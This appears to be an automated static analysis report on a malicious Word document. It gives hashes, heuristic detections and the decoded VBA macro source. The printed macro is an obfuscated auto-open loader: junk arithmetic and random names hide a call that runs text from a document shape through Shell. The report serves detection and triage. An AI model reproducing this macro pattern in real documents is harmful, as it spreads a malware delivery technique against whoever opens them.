Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bef8183ee7d55caa…

MALICIOUS

Office (OLE)

82.9 KB Created: 2018-12-07 14:30:00 Authoring application: Microsoft Office Word First seen: 2019-01-12
MD5: 881f7c5a1899b9664d6358c93fe74c4e SHA-1: dbebe5ce6538d8848fdba179e09e6fc0a6ca33ca SHA-256: bef8183ee7d55caa0ff369f848bcda180f1fecc1d5f4a901b2391682dff44e26
252 Risk Score

Heuristics 9

  • ClamAV: Doc.Malware.Generic-6776027-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6776027-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    . _
Shell(YcjIzjala, wqUwJhzwPw), zYjldr)
         Set qlXfvNzqIhYTmBfEzwvr = dufQiWbLdGuQWVIUOfrqkzv
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
PCBADZFB
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6075 bytes
SHA-256: 8a631ec7d4f8d7c345a746ab895cf92cefd9ee994f1321c8730006de66b9d631
Detection
ClamAV: No threats found
Obfuscation or payload: likely
157 of 189 identifiers look randomly generated (e.g. 'COWXhNcnWGrUaQzUMIiZJUaa') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "iuLbufz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
PCBADZFB
End Sub

Attribute VB_Name = "IuSmcPuhfz"
Function PCBADZFB()
On Error Resume Next
         Set PwVjQvCUZWRzNlpiiVGMLq = NpmlbURFiQCjvom
      MzWmjcTifKEpJwCfY = HtiKbAHRiiKBtuvDuMpEcl
      EFQPcvlOXKGjsnBYVi = tkXiRKtGCppUMWXaF / CLng(70176208) * 238680605 / Tan(207839924) + wUmqmOCPtoTZNrljbz - Cos(37523047) + (227044616 / Int(jZiquJUNwNlzszQknivqrJ))
         Set UFjlWtDwZzhiXaYJIzQBhRi = OzXcStQXcLmwbzw
      jpSJIhCOvTcSjoJCXcXYVb = fjJCMociIBiSszYzhvIh
      QzqnCjZzcZQHKnawfqaTkURC = RDwdqdNujOlTOKECjj / CLng(183160193) * 90075435 / Tan(69138891) + MwABFiNOwjoRljaVmvDNi - Cos(162706774) + (265439018 / Int(RfVQBnpoLjqAcoYijRRF))
         Set vabIchUOokviDoPojRhOZABX = ilBzGBvtwdiEdfYonlv
      PZuUEPFCsauYEhuvSQhjAoHK = kDmJZlPGaKJrhsrwsBVj
      AvkcWWDMwaRjnULS = SofSdWkEkXqnHnlbXjHBhCP / CLng(81666075) * 301966297 / Tan(195831203) + rHuXjdzjjDrXYAXlwNZpn - Cos(214941427) + (54403837 / Int(lDRLPZSYzmswqzJJH))
         Set fqXjBUwIlQpjbUPSQ = ZQhVqUlklsYIzHz
      VdiNmSwAtwrWOnpfAZ = rjJADzRjEjdShhGzlkCW
      UjbscOVzDsHXcHn = dfPVisQQfJpHoEvw / CLng(20496882) * 161852658 / Tan(157084387) + hHaivmAqVvFaSnHEmBYbQLNS - Cos(167391525) + (91566191 / Int(zzIUDjodWEhawrZ))
         Set HcwYsTqjhJCYKq = qGaZLtFQtzIVwnPH
      DaDIDhiItJjTMlORrPrsibKB = DYkwstSCDVknDnZs
      SjVwjNuDGXYPUbPBw = IwJAQRRJQdinbSANJbjOXLpu / CLng(249447752) * 139453457 / Tan(300275930) + itVlGnQuGRTEfXzRZTvGPH - Cos(119512991) + (263065495 / Int(hcwIPOvXiaXHshoBFG))
Set XjMjA = iuLbufz.Shapes(RQzUo + "HOmRtGGO" + KzdmcLoTH).TextFrame
         Set NIumUwRNLvZdhlWRNzfzWjW = ScqYzDdziTzYDjPwVz
      CTFojYouNDRWdlXTsHsO = RauNlwNjjhcWGUD
      oKzLJPvRzVmjMXqc = UktKauaaNiWoAXRTGDztD / CLng(335373583) * 14947063 / Tan(200534692) + QQMhTLrzllkJDOQZkwlZ - Cos(189527805) + (321761802 / Int(UNGTsjhVhPhJiNttSfpOlhJC))
         Set OjluHcAwKNlFEQJPmzqw = kpPapRVsNNXqIoXsRIlSS
      TDHSJXKuaTZtirVUSKfFzzOO = blWUrEiSkWLTXIziSnDROKjW
      qbnNCTpsWhmoaiPvbtUJBuCh = iMKzhRFzXBdqEiCWaA / CLng(177942024) * 78401417 / Tan(301063771) + EoVmQLMwvZGqXGivoQjoDhl - Cos(27790818) + (149075983 / Int(SnaubVdmIVbuAtma))
YcjIzjala = XjMjA.ContainingRange + pWDRQ + OKvrfMK + ZVBzlMkw + IAXvvh + tPmBcb + YzlSJivB + LSvsDNv + EGzBa + HFVdaThv
         Set imCwzHoOqnNnnN = jZvkFMhjVVRpczz
      ViVQnFCNoZQmtjkCNnjG = vKnzCjafRMOrKsERwTaXivj
      uqmlPboPskZYiTlZchXMBvjr = kRUIjKAisCMupQpXwwZS / CLng(207021482) * 232393330 / Tan(190987847) + BvAYTtzHvEiKUHJaZupQY - Cos(202096402) + (254719067 / Int(hpDwJYABolGoJcKwC))
         Set vPqDNzTCWuwsiGErkBPt = qWhMtqGtRzjVKkUniLHtjN
      CLzAKwovPIrFtJrTGNIEuRWT = kECpHADcYfBwqvvdER
      TiaiqrAfaIClodiZ = lFHIocUdqXQRNbpzJArKZMz / CLng(47578288) * 133233159 / Tan(187063028) + WuMSLWBswKFiCFAAUk - Cos(91907108) + (88812723 / Int(MlidnPUZIAnLJwjdEEvMi))
         Set zwJAmanRcwqcmnQ = uvWcJmDdGwCrzQvhXRFLfmFw
      CKQszNlkXOLzmzNvfuqXvSM = IFUhERHpXiGcml
      iRHbBjikUsQzsPb = kwPjstDfFGWbDqkIulHGoqKS / CLng(174943772) * 138210130 / Tan(340628232) + oSPZwkWdXBPoNbVuMGjdHH - Cos(30397534) + (44131973 / Int(UKtnwJXuNrnrwiT))
         Set fJZjfCtrQKAdZsbmMpr = NhLCXdzcESjDJWUaJTk
      TRjKKHOjVmKBwHKzwWL = CQmwbzTCYBctFR
      vzAsQOPGSHiECMW = nIjXCfljMnMLUJRvjAO / CLng(341019248) * 327553242 / Tan(199117432) + nmKUqstRqBZpkWtEQMQfdCE - Cos(248530001) + (58262728 / Int(mXCzWiINwksKvqTVVJvUjZ))
         Set BnJzdjrXGlJDmiWqtkJt = wWaOHsGUpOCFRoBzMHXHLrYn
      PldEqOwihEQjlWr = CQXGwVtUrjcmlkFznGrGcQ
      zFWjkkQblfWJaAjKurINJlKz = wTviikJlQYAblJkbFrGPbfzG / CLng(317800507) * 325152361 / Tan(101162874) + DqNvYmlRUzGvMXJcfi - Cos(55968535) + (227420794 / Int(mEuEiVTVoihUoiaKFDw))
         Set cjHJUrThwBCzprG = osfvlroVtGQprL
      jNLCVYsQUndiOF = msZXzncEWlsmQOaiqlzT
      dokiwcKHIJZQQTYPTOQGJ = RdmbBtJnwRmrJDptALSwNb / CLng(124606625) * 145165899 / Tan(37782) + COWXhNcnWGrUaQzUMIiZJUaa - Cos(88213680) + (31511432 / Int(MbqKQbGrvRZjYOVhiBjlBz))
Const wqUwJhzwPw = 0
         Set UOTLzGOJPtNJSMQGh = OIcNmJXjJuFdwnBizK
      DjPfnSSquLrKLjjwSnG = KnRwTDmvaHnPFjiqzcp
      TSdUSkuuOqjqqiQPOSLkjXQ = XcFfEtwpwLIrJwijJshjYz / CLng(160147709) * 146603872 / Tan(106593796) + bhQEOwCrwpiOpUutr - Cos(205547716) + (175563086 / Int(FSncbnqjOaEjPpSPYuw))
         Set orOOhEXatKkdPmDAj = VrlpIzJzUvRuhmjWuaMQ
      GhEDzJCCLzNkNSAjwjQ = ikbJwdzzsscnTDO
      hmInGwJzEJUTjqvr = LsWFvEWLEKSUZRJDqzMbcwmb / CLng(198261940) * 31069533 / Tan(266820330) + iRBzlrHKsElhlbBm - Cos(281792729) + (189435809 / Int(sKPpriPTNGvbqQMhnIVj))
SzoEuCMp = Array(FtvrJJt, dbGVcWlv, ACiUziOjm, Interaction _
. _
Shell(YcjIzjala, wqUwJhzwPw), zYjldr)
         Set qlXfvNzqIhYTmBfEzwvr = dufQiWbLdGuQWVIUOfrqkzv
      SPkREfWYPpMqrOQrWffb = CQjWjkTDBGjzzwOlKHzj
      BjIRdzOzTERTCQzEuU = DUNijrsQBGMXirHAjXEFkEE / CLng(224312938) * 11229359 / Tan(98766844) + ziPjPmCjBowcaljMsGhj - Cos(186451282) + (305399042 / Int(PjqOKwQfjRMvimazl))
         Set KILYHttqZhTmzbCJ = RSaEipIjVdBLODnZczjRY
      NmfGzdqWKkbYBiBIb = CslQrfLijNWdVrLBEn
      cqfpwSRjpCEXUWNPjdz = AuVwdzhPkNzdNjwcWDnwavVb / CLng(183168760) * 276490999 / Tan(16637324) + HcfXHsYhUjLwlBz - Cos(185305828) + (17961825 / Int(JlXksdqzVEZtUnzaHHh))
         Set lJsPmaYNncWDTkQf = RsSYclPPUONdjc
      EFZEzlnsliQoRzLAuOIo = moJXdARLKjDArzOL
      hOiAjpLwwQJOTObo = SRQjTlWjawNoZzzpi / CLng(215988150) * 299748797 / Tan(67198228) + FwzbfkIzrUbMYhwu - Cos(212523393) + (92991688 / Int(IUGqwHYQLZliidHMTSEo))
         Set wowPmjUhaMAGQJScV = fcpzccAShQBZbwXrZB
      AKGIwSoaBLLafOLjjazMUPTC = fBkBjYjQfVKZUt
      oBzHVpVKPRqRZpdkqEFQ = DYSmbJAtBHMjVYSPM / CLng(214863998) * 90962107 / Tan(64592653) + UksHKbCkTUPcNkdjUufVQOJ - Cos(196519453) + (242295764 / Int(RKUiXrGainZfRi))
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.